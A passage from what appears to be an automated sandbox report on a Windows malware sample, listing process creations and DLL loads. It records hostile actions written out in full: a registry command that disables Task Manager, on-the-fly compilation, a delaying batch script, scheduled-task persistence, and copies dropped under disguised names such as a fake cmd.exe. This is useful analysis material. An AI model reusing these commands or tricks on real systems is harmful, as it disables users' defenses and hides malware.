                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperComponentFontDhcp\Mscommon.exe "C:\hyperComponentFontDhcp/Mscommon.exe"Jump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"Jump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ktmw32.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: amsi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: userenv.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: wbemcomn.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: iphlpapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: dnsapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: winnsi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rasapi32.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rasman.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: rtutils.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mswsock.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: winhttp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: winmm.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: winmmbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: mmdevapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: devobj.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ksuser.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: avrt.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: audioses.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: powrprof.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: umpdc.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: msacm32.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: midimap.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: edputil.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: dwrite.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: windowscodecs.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: ntmarta.dll
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeSection loaded: dpapi.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: version.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: version.dll
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeSection loaded: vcruntime140_clr0400.dll
